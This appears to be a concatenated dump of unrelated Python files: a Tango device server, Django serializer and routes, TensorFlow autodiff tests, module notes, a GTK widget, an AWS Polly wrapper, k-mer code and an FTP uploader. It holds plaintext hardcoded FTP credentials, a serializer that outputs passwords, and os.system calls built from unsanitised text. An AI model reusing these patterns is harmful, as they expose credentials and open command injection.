    # Device Properties
    device_property_list = {
        'ip_address':
            [PyTango.DevString,
             "TCP Server IP address.",
             ["172.19.10.65"]],
        'port':
            [PyTango.DevLong,
             '',
             [55000]],
        }

    # Command definitions
    cmd_list = {
        }

    # Attribute definitions
    attr_list = {
        'magnetField':
            [[PyTango.DevFloat,
              PyTango.SCALAR,
              PyTango.READ_WRITE],
             {
                 'label': "Magnetic Field Intensity",
                 'unit': "Gauss",
                 'display unit': "kG",
             }],
        'currentMonitor':
            [[PyTango.DevFloat,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Current Monitor",
                 'unit': "[A]",
                 'display unit': "[A]",
                 'description': "+/-1V / 10A",
             }],
        'voltageMonitor':
            [[PyTango.DevFloat,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Voltage Monitor",
                 'unit': "[V]",
                 'display unit': "[V]",
                 'description': "+/-1V / 20V",
             }],
        'fieldMonitorPlus':
            [[PyTango.DevFloat,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Field Monitor Plus",
             }],
        'fieldMonitorMinus':
            [[PyTango.DevFloat,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Field Monitor Minus",
             }],
        'amplifierPower':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "+5V (Amplifier Power)",
                 'description': "Active high, the 231HC DC supply is providing sufficient voltage for operation.",
             }],
        'normal':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Normal",
                 # BUG FIX: user-facing typo "ill operate" -> "will operate".
                 'description': "Active low, the 231HC is ready and will operate when not inhibited.",
             }],
        'inhibit':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Inhibit",
                 'description': "Active low, the front panel inhibit switch is active.",
             }],
        'moduleFault':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Module Fault",
                 'description': "Active low, the 231HC has a fault in the MOSFET power output module.",
             }],
        'dcFault':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "DC Fault",
                 'description': "Active low, one or more DC voltages are outside operating limits.",
             }],
        'overCurrent':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Over Current",
                 'description': "Active low, the 231HC is disabled due to current over limits.",
             }],
        'overTemperature':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Over Temperature",
                 'description': "Active low, the 231HC is disabled due to an over temperature condition.",
             }],
        'interlockStatus':
            [[PyTango.DevBoolean,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Interlock Status",
             }],
        'magnetField_target':
            [[PyTango.DevFloat,
              PyTango.SCALAR,
              PyTango.READ],
             {
                 'label': "Magnetic Field Intensity",
                 'unit': "Gauss",
                 'display unit': "kGauss",
             }],
        }
def main():
    """Register the GMW device class and run the Tango server loop."""
    try:
        tango_util = PyTango.Util(sys.argv)
        tango_util.add_class(GMWClass, GMW, 'GMW')
        #----- PROTECTED REGION ID(GMW.add_classes) ENABLED START -----#
        #----- PROTECTED REGION END -----# // GMW.add_classes
        instance = PyTango.Util.instance()
        instance.server_init()
        instance.server_run()
    except PyTango.DevFailed as e:
        print ('-------> Received a DevFailed exception:', e)
    except Exception as e:
        print ('-------> An unforeseen exception occured....', e)
# Script entry point: start the Tango device server.
if __name__ == '__main__':
    main()
|
21,547 | ed91358303d2a57a848748824b9c9f55bf46f818 | from rest_framework import serializers
from .models import User
class GetAllUser(serializers.ModelSerializer):
    """Serialize a User's profile fields for the user-listing endpoint."""
    class Meta:
        model = User
        # NOTE(security review): 'password' is listed here -- if this
        # serializer is ever used for output it exposes the stored password
        # value; confirm usage and consider removing it or declaring it
        # write_only on the serializer.
        fields = ('username', 'email', 'sex', 'phone_number', 'date_of_birth', 'school', 'image', 'password')
21,548 | ddd0756a46affb321f9e43ef8939acdc98d73b26 | from django.urls import path
from rest_framework import routers
from pyrunner import views
from .api import PyrunnerViewSet
# URL namespace for reverse() / {% url %} lookups, e.g. "pyrunner:code-list".
app_name = 'pyrunner'
# DefaultRouter generates the standard list/detail routes plus an API root.
router = routers.DefaultRouter()
# Empty prefix mounts the viewset at the app root; "code" is the basename.
router.register('', PyrunnerViewSet, 'code')
urlpatterns = router.urls
|
21,549 | 0c7c5e0fb9dbf894597d7211e5f266cd5c954dde | """
Unit testing second order matrix vector product.
"""
from __future__ import (division, print_function, unicode_literals)
import numpy as np
import tensorflow as tf
from tensorflow_forward_ad import logger
from tensorflow_forward_ad.fwgrad import forward_gradients
from tensorflow_forward_ad.second_order import (
hessian_vec_fw, hessian_vec_bk, gauss_newton_vec, fisher_vec_fw,
fisher_vec_bk, gauss_newton_vec_z, fisher_vec_z)
log = logger.get()
class TestSecondOrderFwGrad(tf.test.TestCase):
    """Tests for forward-mode second-order matrix-vector products.

    Each test compares forward-mode Hessian/Gauss-Newton/Fisher vector
    products against reverse-mode autodiff or a finite-difference /
    analytic reference.
    """

    def test_hessian_quadratic(self):
        """Forward-mode Hv equals reverse-mode Hv on a simple quadratic."""
        rnd = np.random.RandomState(0)
        dtype = tf.float64
        with tf.Graph().as_default():
            r = tf.Variable(0.0, dtype=dtype)
            x = tf.constant(rnd.uniform(-1.0, 1.0, [2, 27]), dtype=dtype, name="x")
            w2 = tf.constant(rnd.uniform(-1.0, 1.0, [27, 1]), dtype=dtype, name="w2")
            v2 = tf.constant(rnd.uniform(-1.0, 1.0, [27, 1]), dtype=dtype, name="v2")
            # Perturbed weight w2 + r*v2; forward mode differentiates wrt r.
            w2v = tf.add(w2, tf.multiply(r, v2))
            h2 = tf.matmul(x, w2v)
            y2 = tf.reduce_sum(h2 * h2)
            grad_w = tf.gradients(y2, w2)
            hv_fw = hessian_vec_fw(y2, [w2v], [v2])
            hv_bk = hessian_vec_bk(y2, [w2], [v2])
            with self.test_session() as sess:
                sess.run(tf.global_variables_initializer())
                grad_w = sess.run(grad_w)
                hv_fw_val = sess.run(hv_fw)
                hv_bk_val = sess.run(hv_bk)
                np.testing.assert_allclose(hv_fw_val, hv_bk_val, rtol=1e-5)

    def test_sparse_softmax_with_logits_grad(self):
        """Forward-mode Hv matches finite differences through the fused loss op."""
        rnd = np.random.RandomState(0)
        dtype = tf.float64  # Use float64 and CPU for finite difference checking.
        with tf.Graph().as_default(), tf.device("/cpu:0"):
            r = tf.Variable(0.0, dtype=dtype)
            # Input.
            x = tf.constant(rnd.uniform(-1.0, 1.0, [2, 27]), dtype=dtype, name="x")
            # Fully connected.
            v = tf.constant(rnd.uniform(-0.1, 0.1, [27, 2]), dtype=dtype, name="v")
            w = tf.constant(rnd.uniform(-1.0, 1.0, [27, 2]), dtype=dtype, name="w")
            y = tf.matmul(x, w + r * v)
            label = tf.constant([1, 0], dtype=tf.int32)
            loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
                logits=y, labels=label)
            loss = tf.reduce_sum(loss)
            hv_fw = hessian_vec_fw(loss, [w], [v])[0]
            # hv_bk = hessian_vec_bk(loss, [w], [v])[0]
            grad_w = tf.gradients(loss, [w])[0]
            with self.test_session() as sess:
                # Compute Hv with central finite differences on the gradient.
                sess.run(tf.global_variables_initializer())
                eps = 1e-5
                sess.run(tf.assign(r, -eps))
                grad_w_val1 = sess.run(grad_w)
                sess.run(tf.assign(r, eps))
                grad_w_val2 = sess.run(grad_w)
                fndv = (grad_w_val2 - grad_w_val1) / (2 * eps)
                # Compute Hv with forward mode autodiff.
                sess.run(tf.global_variables_initializer())
                fwv = sess.run(hv_fw)
                # Reverse-mode comparison intentionally disabled: the fused op's
                # second-order gradient is expected to disagree here.
                np.testing.assert_allclose(fndv, fwv, rtol=1e-5)
                # np.testing.assert_allclose(fndv, bkv, rtol=1e-5)

    def test_softmax_grad(self):
        """Hv agrees across finite differences, forward mode, and reverse mode."""
        rnd = np.random.RandomState(0)
        dtype = tf.float64  # Use float64 and CPU for finite difference checking.
        with tf.Graph().as_default(), tf.device("/cpu:0"):
            r = tf.Variable(0.0, dtype=dtype)
            # Input.
            x = tf.constant(rnd.uniform(-1.0, 1.0, [2, 27]), dtype=dtype, name="x")
            # Fully connected.
            v = tf.constant(rnd.uniform(-0.1, 0.1, [27, 2]), dtype=dtype, name="v")
            w = tf.constant(rnd.uniform(-1.0, 1.0, [27, 2]), dtype=dtype, name="w")
            y = tf.matmul(x, w + r * v)
            label = tf.constant([1, 0], dtype=tf.int32)
            # Manually composed cross entropy (not the fused op).
            y = tf.nn.softmax(y)
            t = tf.one_hot(label, 2, dtype=dtype)
            loss = tf.log(y + 1e-5) * t
            loss = tf.reduce_sum(loss)
            hv_fw = hessian_vec_fw(loss, [w], [v])[0]
            hv_bk = hessian_vec_bk(loss, [w], [v])[0]
            grad_w = tf.gradients(loss, [w])[0]
            with self.test_session() as sess:
                # Compute Hv with central finite differences on the gradient.
                sess.run(tf.global_variables_initializer())
                eps = 1e-5
                sess.run(tf.assign(r, -eps))
                grad_w_val1 = sess.run(grad_w)
                sess.run(tf.assign(r, eps))
                grad_w_val2 = sess.run(grad_w)
                fndv = (grad_w_val2 - grad_w_val1) / (2 * eps)
                # Compute Hv with forward mode autodiff.
                sess.run(tf.global_variables_initializer())
                fwv = sess.run(hv_fw)
                # Compute Hv with reverse mode autodiff.
                bkv = sess.run(hv_bk)
                np.testing.assert_allclose(fndv, fwv, rtol=1e-5)
                np.testing.assert_allclose(fndv, bkv, rtol=1e-5)
                np.testing.assert_allclose(fwv, bkv, rtol=1e-5)

    def _test_hessian_cnn(self):
        """Disabled CNN Hessian test (leading underscore keeps it out of runs).

        BUG FIX: the original body referenced undefined names ``r``, ``wv``
        and ``w_v`` and would raise NameError if re-enabled; the perturbed
        weights are now defined and used in the conv ops, mirroring the
        quadratic test above.
        """
        rnd = np.random.RandomState(0)
        dtype = tf.float32  # tf.nn.conv2d / max_pool do not support float64.
        with tf.Graph().as_default():
            r = tf.Variable(0.0, dtype=dtype)
            # Input.
            x = tf.constant(
                np.random.uniform(-1.0, 1.0, [2, 5, 5, 2]), dtype=dtype, name="x")
            # First convolution.
            v = tf.constant(
                np.random.uniform(-0.1, 0.1, [2, 2, 2, 3]), dtype=dtype, name="v")
            w = tf.constant(
                np.random.uniform(-1.0, 1.0, [2, 2, 2, 3]), dtype=dtype, name="w")
            wv = w + r * v
            h = tf.nn.conv2d(x, wv, [1, 1, 1, 1], "SAME")
            h = tf.nn.max_pool(h, [1, 3, 3, 1], [1, 2, 2, 1], "SAME")
            h = tf.nn.relu(h)
            # Second convolution.
            v_ = tf.constant(
                np.random.uniform(-0.1, 0.1, [2, 2, 3, 3]), dtype=dtype, name="v_")
            w_ = tf.constant(
                np.random.uniform(-1.0, 1.0, [2, 2, 3, 3]), dtype=dtype, name="w_")
            w_v = w_ + r * v_
            h = tf.nn.conv2d(h, w_v, [1, 1, 1, 1], "SAME")
            h = tf.nn.sigmoid(h)
            # Fully connected.
            dim = 27
            v2 = tf.constant(rnd.uniform(-0.1, 0.1, [dim, 2]), dtype=dtype, name="v2")
            w2 = tf.constant(rnd.uniform(-1.0, 1.0, [dim, 2]), dtype=dtype, name="w2")
            w2v = w2 + r * v2
            h = tf.reshape(h, [-1, dim])
            y = tf.matmul(h, w2v)
            label = tf.constant([1, 0], dtype=tf.int32)
            # Use manual cross entropy instead of the fused op.
            label_dense = tf.one_hot(label, 2, dtype=dtype)
            y = tf.nn.softmax(y)
            loss = label_dense * tf.log(y + 1e-5)
            loss = tf.reduce_sum(loss)
            hv_fw = hessian_vec_fw(loss, [w2v, w_v, wv], [v2, v_, v])
            hv_bk = hessian_vec_bk(loss, [w2, w_, w], [v2, v_, v])
            with self.test_session() as sess:
                sess.run(tf.global_variables_initializer())
                hv_fw_val = sess.run(hv_fw)
                hv_bk_val = sess.run(hv_bk)
                for fwv, bkv in zip(hv_fw_val, hv_bk_val):
                    np.testing.assert_allclose(fwv, bkv, rtol=1e-5)

    def test_gauss_newton_quadratic(self):
        """Gauss-Newton equals Fisher for square loss; fw and bk Fisher agree."""
        rnd = np.random.RandomState(0)
        with tf.Graph().as_default():
            r = tf.Variable(0.0)
            x = tf.constant(
                rnd.uniform(-1.0, 1.0, [2, 27]), dtype=tf.float32, name="x")
            w = tf.constant(
                rnd.uniform(-1.0, 1.0, [27, 3]), dtype=tf.float32, name="w2")
            v = tf.constant(
                rnd.uniform(-1.0, 1.0, [27, 3]), dtype=tf.float32, name="v2")
            wv = tf.add(w, tf.multiply(r, v))
            z = tf.matmul(x, wv)
            y = 0.5 * tf.reduce_sum(z * z)
            # Gauss-Newton, same as Fisher for square loss.
            gv_fw = gauss_newton_vec(y, z, [w], [v])[0]
            # Fisher towards the output layer.
            fv_fw = fisher_vec_fw(z, [w], [v])
            # Fisher using tf.gradients (reverse mode).
            fv_bk = fisher_vec_bk(y, [w], [v])
            # Fisher using forward mode, towards loss function.
            fv_fw_y = fisher_vec_fw(y, [w], [v])
            with self.test_session() as sess:
                sess.run(tf.global_variables_initializer())
                gv_fw_val = sess.run(gv_fw)
                fv_fw_val = sess.run(fv_fw)
                np.testing.assert_allclose(gv_fw_val, fv_fw_val, rtol=1e-5, atol=1e-5)
                fv_fw_y_val = sess.run(fv_fw_y)
                fv_bk_val = sess.run(fv_bk)
                np.testing.assert_allclose(fv_fw_y_val, fv_bk_val, rtol=1e-5, atol=1e-5)

    def test_gauss_newton_output_quadratic(self):
        """Gauss-Newton-vector product matches its analytic J^T H J v form."""
        rnd = np.random.RandomState(0)
        with tf.Graph().as_default():
            x = tf.constant(
                rnd.uniform(-1.0, 1.0, [27, 2]), dtype=tf.float32, name="x")
            h = tf.constant(
                rnd.uniform(-1.0, 1.0, [3 * 2, 3 * 2]), dtype=tf.float32, name="h")
            # Make h symmetric positive definite.
            h = tf.matmul(tf.transpose(h), h)
            j = tf.constant(
                rnd.uniform(-1.0, 1.0, [3, 27]), dtype=tf.float32, name="j")
            z = tf.matmul(j, x)  # [3, 2]
            z_ = tf.reshape(z, [3 * 2, 1])  # [6, 1]
            y = 0.5 * tf.matmul(tf.matmul(tf.transpose(z_), h), z_)  # [1, 1]
            v = tf.constant(
                rnd.uniform(-1.0, 1.0, [3, 2]), dtype=tf.float32, name="v")
            act_jv = tf.gradients(z, x, v, gate_gradients=True)[0]
            act_hjjv = gauss_newton_vec_z(y, z, x, v)[0]
            # Build the expected value explicitly from j and h.
            exp_jv = tf.matmul(tf.transpose(j), v)  # [27, 2]
            exp_jjv = tf.matmul(j, exp_jv)  # [3, 2]
            exp_jjv_ = tf.reshape(exp_jjv, [3 * 2, 1])
            exp_hjjv = tf.matmul(h, exp_jjv_)  # [6, 1]
            exp_hjjv = tf.reshape(exp_hjjv, [3, 2])
            with self.test_session() as sess:
                sess.run(tf.global_variables_initializer())
                h_val = sess.run(h)
                e, _ = np.linalg.eig(h_val)
                self.assertTrue((e > 0).all())
                act_hjjv_val, exp_hjjv_val, act_jv_val, exp_jv_val = sess.run(
                    [act_hjjv, exp_hjjv, act_jv, exp_jv])
                np.testing.assert_allclose(act_jv_val, exp_jv_val, rtol=1e-5)
                np.testing.assert_allclose(act_hjjv_val, exp_hjjv_val, rtol=1e-5)

    def test_fisher_output_quadratic(self):
        """Fisher-vector product matches its analytic J J^T v form."""
        rnd = np.random.RandomState(0)
        with tf.Graph().as_default():
            x = tf.constant(
                rnd.uniform(-1.0, 1.0, [27, 2]), dtype=tf.float32, name="x")
            h = tf.constant(
                rnd.uniform(-1.0, 1.0, [3 * 2, 3 * 2]), dtype=tf.float32, name="h")
            h = tf.matmul(tf.transpose(h), h)
            j = tf.constant(
                rnd.uniform(-1.0, 1.0, [3, 27]), dtype=tf.float32, name="j")
            z = tf.matmul(j, x)  # [3, 2]
            z_ = tf.reshape(z, [3 * 2, 1])  # [6, 1]
            y = 0.5 * tf.matmul(tf.matmul(tf.transpose(z_), h), z_)  # [1, 1]
            v = tf.constant(
                rnd.uniform(-1.0, 1.0, [3, 2]), dtype=tf.float32, name="v")
            act_jjv = fisher_vec_z(z, x, v)[0]
            exp_jv = tf.matmul(tf.transpose(j), v)  # [27, 2]
            exp_jjv = tf.matmul(j, exp_jv)  # [3, 2]
            with self.test_session() as sess:
                sess.run(tf.global_variables_initializer())
                act_jjv_val, exp_jjv_val = sess.run([act_jjv, exp_jjv])
                np.testing.assert_allclose(act_jjv_val, exp_jjv_val, rtol=1e-5)
# Run all test cases when this file is executed directly.
if __name__ == "__main__":
    tf.test.main()
|
21,550 | daabe38be26e31998ca786eedd32700e61c18440 | import math
# Lecture notes: quick tour of the `math` and `random` standard-library
# modules (comments translated to English).
help(math)  # lists everything the math module provides
value = 4.35
math.floor(value)  # rounds down to the nearest integer
math.ceil(value)  # rounds up to the nearest integer
round(value)  # rounds to the nearest integer
round(4.5)  # ties go down here (to 4)
round(5.5)  # ties go up here (to 6)
# Python rounds ties toward the nearest even number (banker's rounding)
math.pi
from math import pi
pi
math.e
math.inf  # infinity
math.nan  # not a number
math.log(math.e)
math.log(100,10)  # the exponent 10 must be raised to in order to get 100, i.e. 10**2
math.sin(10)
math.degrees(pi/2)
math.radians(180)
# On to the random module
import random
random.randint(0,100)
random.seed(101)  # run together with all the lines below so they produce the same numbers every time
print(random.randint(0,100))  # i.e. however many times this runs, it should yield 74 (unless the seed is reset, in which case it changes)
print(random.randint(0,100))  # same for this one
print(random.randint(0,100))  # etc...
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
# random item from list
mylist = list(range(0,20))
mylist
random.choice(mylist)
# grab multiple items from list
# sample with replacement: allows an int to be chosen more than once
random.choices(population=mylist,k=10)  # should pick duplicate numbers at some point
# sample without replacement: once a number is chosen it cannot come up again
random.sample(population=mylist,k=10)
# shuffle mutates the list in place; it stays shuffled
random.shuffle(mylist)
mylist
random.uniform(a=0,b=100)  # random float between a and b; every value equally likely
random.gauss(mu=0, sigma=1)  # normal distribution
21,551 | 4b0ed3df61f6aec82084d1ed983ed5335869ce58 | import gi
from CanvasElement import CanvasElement
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
class PacketInfoField(CanvasElement):
    """Canvas element that shows a two-column "Packet Information" table.

    Builds three list-box rows: a header row (Value / Text Description),
    an empty data row, and a row with a "+" button for adding entries.
    """

    def __init__(self):
        CanvasElement.__init__(self, "Packet Information")
        # Header row: two read-only column titles.
        self._add_row([
            (self._readonly_entry("Value"), True, True, 0),
            (self._readonly_entry("Text Description"), True, True, 0),
        ])
        # First (empty) data row.
        self._add_row([
            (self._readonly_entry(""), True, True, 0),
            (self._readonly_entry(""), True, True, 0),
        ])
        # Action row: spacer label plus the "+" add button.
        addButton = Gtk.Button("+")
        emptyLabel = Gtk.Label("")
        self._add_row([
            (emptyLabel, True, True, 100),
            (addButton, False, False, 0),
        ])

    @staticmethod
    def _readonly_entry(text):
        # Build a non-editable Gtk.Entry pre-filled with *text*.
        entry = Gtk.Entry()
        entry.set_text(text)
        entry.set_editable(False)
        return entry

    def _add_row(self, packed_children):
        # Append one ListBoxRow containing a horizontal box; each element of
        # *packed_children* is (widget, expand, fill, padding) for pack_start.
        row = Gtk.ListBoxRow()
        hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)
        row.add(hbox)
        for widget, expand, fill, padding in packed_children:
            hbox.pack_start(widget, expand, fill, padding)
        # self.listbox is provided by CanvasElement -- TODO confirm.
        self.listbox.add(row)
21,552 | f42a04593832516f9fe5e789bffcfed414563061 | import hashlib
from os import system, path
class Speech(object):
    """Synthesize speech with AWS Polly (CLI) and play cached MP3s via mplayer."""

    def __init__(self):
        # Cache directory for generated MP3 files, next to this module.
        self.file_path = path.dirname(path.realpath(__file__)) + "/static/"

    def hash_file(self, text):
        """Return a deterministic MP3 filename derived from *text* (SHA-224)."""
        # BUG FIX: hashlib digests require bytes on Python 3; encode str
        # input so this works on both Python 2 and 3.
        if isinstance(text, str):
            text = text.encode("utf-8")
        return hashlib.sha224(text).hexdigest() + ".mp3"

    def exists(self, filename):
        """True when *filename* is already cached under ``file_path``."""
        return path.isfile(self.file_path + filename)

    def make(self, text, text_type="ssml"):
        """Synthesize *text* to a cached MP3 and return its filename."""
        fn = self.hash_file(text)
        if self.exists(fn):
            return fn
        # NOTE(security): *text* is interpolated into a shell command; do not
        # pass untrusted input here (command injection risk).
        system('aws polly synthesize-speech --text-type %s --text "%s" --output-format mp3 --voice-id Joanna %s' % (
            text_type,
            text,
            self.file_path + fn
        ))
        return fn

    def chime(self):
        """Play the notification chime sound."""
        chime = "mplayer -ao alsa -really-quiet -noconsolecontrols %schime.mp3"
        system(chime % (self.file_path))

    def say(self, text):
        """Synthesize (or fetch cached) speech for *text* and play it."""
        fn = self.make(text)
        speech = "mplayer -ao alsa -really-quiet -noconsolecontrols %s%s"
        system(speech % (self.file_path, fn))
|
21,553 | d260ff9b9e5f58b66b7dc1d2de57b0a63b2cddf3 | import sys
import re
import numpy as np
from ..utils.utils_words import make_km_list
from ..utils.utils_bow import frequency
from ..utils.utils_fasta import get_seqs
def find_rev_comp(sequence, rev_comp_dictionary):
    """Return the reverse complement of *sequence*, memoized in the dict.

    Exits the program with an error message on any non-ACGTN character.
    """
    # Save time by storing reverse complements in a hash.
    if sequence in rev_comp_dictionary:
        return rev_comp_dictionary[sequence]
    complement = {"A": "T", "C": "G", "G": "C", "T": "A", "N": "N"}
    pieces = []
    # Walk the sequence back-to-front, complementing each base.
    for letter in reversed(sequence):
        try:
            pieces.append(complement[letter])
        except KeyError:
            error_info = ("Unknown DNA character (%s)\n" % letter)
            sys.exit(error_info)
    return_value = "".join(pieces)
    # Store this value for future use.
    rev_comp_dictionary[sequence] = return_value
    return return_value
def _cmp(a, b):
return (a > b) - (a < b)
def make_rev_comp_km_list(km_list):
    """Collapse *km_list* to the k-mers that are <= their reverse complement."""
    rev_comp_dictionary = {}
    filtered = []
    for km in km_list:
        # Keep the lexicographically smaller member of each rev-comp pair.
        if _cmp(km, find_rev_comp(km, rev_comp_dictionary)) <= 0:
            filtered.append(km)
    return filtered
def km_bow(input_file, k, alphabet, rev_comp=False):
    """Generate a normalized k-mer frequency vector for each sequence.

    Reads FASTA sequences from *input_file*, counts every k-mer over
    *alphabet* in each sequence, optionally collapses reverse-complement
    pairs (DNA alphabets only), and returns an array of per-sequence
    frequency vectors rounded to 8 decimals.
    """
    if rev_comp and re.search(r'[^acgtACGT]', ''.join(alphabet)) is not None:
        # Typo fixed: "compliment" -> "complement".
        sys.exit("Error, Only DNA sequence can be reverse complement.")
    with open(input_file, 'r') as f:
        seq_list = get_seqs(f, alphabet)
    vector = []
    km_list = make_km_list(k, alphabet)
    # BUG FIX: share one memo dict across all calls -- the original passed a
    # fresh {} to find_rev_comp each time, defeating its caching entirely.
    rev_comp_dictionary = {}
    for seq in seq_list:
        # (Removed leftover debug progress prints.)
        count_sum = 0
        # Generate the km frequency dict.
        km_count = {}
        for km in km_list:
            temp_count = frequency(seq, km)
            if not rev_comp:
                km_count[km] = km_count.get(km, 0) + temp_count
            else:
                # Accumulate each pair under its canonical (smaller) k-mer.
                rev_km = find_rev_comp(km, rev_comp_dictionary)
                key = km if km <= rev_km else rev_km
                km_count[key] = km_count.get(key, 0) + temp_count
            count_sum += temp_count
        # Normalize.
        # NOTE(review): count_sum == 0 (a sequence shorter than k) would
        # raise ZeroDivisionError, as in the original -- confirm inputs.
        if not rev_comp:
            count_vec = [km_count[km] for km in km_list]
        else:
            rev_comp_km_list = make_rev_comp_km_list(km_list)
            count_vec = [km_count[km] for km in rev_comp_km_list]
        count_vec = [round(float(e) / count_sum, 8) for e in count_vec]
        vector.append(count_vec)
    return np.array(vector)
|
21,554 | 2536e8d70dce42e9b41df43c5b17d093182eb827 | # -*- coding: utf-8 -*-
from __future__ import division
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import scoped_session
import logging
# from selenium import webdriver
# from selenium.webdriver.common.by import By
# from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
# from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from datetime import datetime
import humanize
import os
import shutil
from ftplib import FTP
import requests
from contextlib import closing
from pyquery import PyQuery as pq
# #scoped_session 线程安全
# def create_scoped_session(engine, base):
# Session = sessionmaker(bind=engine) # 创建一个Session类
# session = scoped_session(Session) # 生成一个Session实例
#
# return session
# def wp_logging(level='debug', Msg='Msg',allow_print=True):
# if level=='debug':
# if allow_print:
# print Msg
# logging.debug(Msg)
# return
# def get_or_create(session, model, is_global=False, defaults=None, filter_cond=None,**kwargs):
# """
# @is_global=False #db_session 是不是全局性的,是,则不能在这里关闭。
# """
# created = None
# if filter_cond is not None:
# instance = session.query(model).filter_by(**filter_cond).first()
# else:
# instance = session.query(model).filter_by(**kwargs).first()
# if instance:
# created = False
# # 文章存在 --> 返回文章实例 ,(没有新建)False
# if not is_global:
# session.close()
# return instance,created
# else:
# created = True
# # params = dict((k, v) for k, v in kwargs.iteritems())
# # params.update(defaults or {})
# instance = model(**kwargs)
# if not is_global:
# session.add(instance)
# session.commit()
# session.close()
# # 文章不存在 --> 返回文章实例 ,(有新建)True
# return instance, created
# class FirefoxDriver():
#
# def __init__(self):
# self.login_url = 'http://www.uploadable.ch/login.php'
# # url_login = 'http://www.uploadable.ch/login.php'
# # url_download = 'http://www.uploadable.ch/file/SwkwFPd7scRC/123.pdf'
#
#
# self.ffprofile = webdriver.FirefoxProfile(FirefoxProfilePath)
# self.driver = None
# self.create_time = datetime.now()
# self.login_time = None
# def get_new_driver(self):
# driver = webdriver.Firefox(self.ffprofile)
# driver.get(self.login_url)
# inputElement_userName = driver.find_element_by_name("userName")
# inputElement_userPassword = driver.find_element_by_name("userPassword")
# inputElement_userName.clear()
# inputElement_userPassword.clear()
#
# inputElement_userName.send_keys('lxl001')
# inputElement_userPassword.send_keys('qQ2@wW')
#
# btn_login = driver.find_element_by_id("loginFormSubmit")
# btn_login.click()
#
#
# WebDriverWait(driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME, "dashboard_button")))
# return driver
#
# def download_file(self,url_inst):
# status = False #True表示程序已经成功开始下载文件
# db_session = create_session()
# db_session.add(url_inst)
# try:
# self.driver.get(url_inst.url)
# # time.sleep(3)
# # Msg = "开始下载文件:%s" % url_inst.url
# # wp_logging(Msg=Msg)
# status = True
# except Exception,e:
# Msg = '下载文件出错! 异常信息(%s);文章ID(%s);下载链接(%s) ' % (e, url_inst.article_id, url_inst.url)
# wp_logging(Msg=Msg)
# raise e
# db_session.close()
# return status
#
# def driver_quit(self):
# self.driver.quit()
#
# #todo 如果下载出现HTML文件,cooki过期,或者定义为每20分钟重新登录一次。
# common_utility.get_rared_files_name('/home/l/app/learning/wangpan/wp_resource/articles_file/1/rared_files/')
import subprocess, threading
class ShellCommand(object):
    """Run a shell command in a background thread with a hard timeout.

    Python 2 code (print statements).  The command is executed with
    ``shell=True``, so ``cmd`` must be a full, trusted command line.
    """

    def __init__(self, cmd):
        # Full shell command line to run.
        self.cmd = cmd
        # Populated by the worker thread once Popen has started.
        self.process = None

    def run(self, timeout):
        """Execute ``self.cmd``; kill it if it outlives ``timeout`` seconds.

        Returns ``{'status': 'Time Out'}`` on timeout, otherwise
        ``{'status': <returncode>}`` (0 means success).
        """
        def target():
            print 'Shell Thread started'
            self.process = subprocess.Popen(self.cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            out, err = self.process.communicate()
            print 'Shell Thread finished'
        thread = threading.Thread(target=target)
        thread.start()
        thread.join(timeout)
        if thread.is_alive():
            # The worker outlived the timeout: terminate the child process.
            # NOTE(review): self.process may still be None here if Popen has
            # not run yet, which would raise AttributeError -- confirm.
            print 'Terminating Shell process'
            self.process.terminate()
            return {'status': 'Time Out'}
        s = self.process.returncode
        # On success, s == 0
        return {'status': s}

    def check_stdout(self, str, out):
        """Report (in Chinese) whether pattern ``str`` occurs in ``out``.

        NOTE(review): the parameter name ``str`` shadows the builtin.
        """
        # Can be used to decide which pieces of information the output contains.
        import re
        result = re.findall(str, out, re.MULTILINE)
        if result:
            return u'成功的out里找到str'
        else:
            return u'在out里面找不到str'
class FilmAvFtp():
    """FTP upload session for the supported file-hosting services.

    Known services: uploadable.ch, uploaded.net, ryushare.com.  For any
    other ``url_type`` no connection is opened and the host/credential
    attributes are left unset, exactly as before.
    """

    # Per-service (host, user, password); None means "use the constructor
    # argument with the same name".
    _SERVICES = {
        'uploadable.ch': (None, None, None),
        'uploaded.net': ('ftp.uploaded.net', '12917027', '123qwe'),
        'ryushare.com': ('ftp.ryushare.com', 'nlxl001', 'fhnmmw3e10'),
    }

    def __init__(self, host='ftp.uploadable.ch', user='lxl001', password='f19174de', port=21, blocksize=8192, url_type=''):
        # Transfer bookkeeping, shared by all services.
        self.blocksize = blocksize
        self.total_size = 0
        self.uploaded_size = 0
        self.file_name = u''
        service = self._SERVICES.get(url_type)
        if service is not None:
            srv_host, srv_user, srv_password = service
            self.host = host if srv_host is None else srv_host
            self.user = user if srv_user is None else srv_user
            self.password = password if srv_password is None else srv_password
            self.port = port
            # Network I/O happens in the constructor, as in the original.
            self.ftp = FTP(self.host)

    def login(self):
        """Authenticate on the already-opened FTP connection."""
        self.ftp.login(user=self.user, passwd=self.password)
# def handle(self):
#
# pass
#
# def upload_list(self,full_path_file_names):
#
# for full_path_file_name in full_path_file_names:
# file_name = os.path.basename(full_path_file_name)
# with open(full_path_file_name,'rb') as f:
# try:
# myFtp.ftp.storbinary('STOR ' + file_name,
# f,
# self.blocksize,
# self.callback_handle(file_name))
# except ftplib.error_perm :
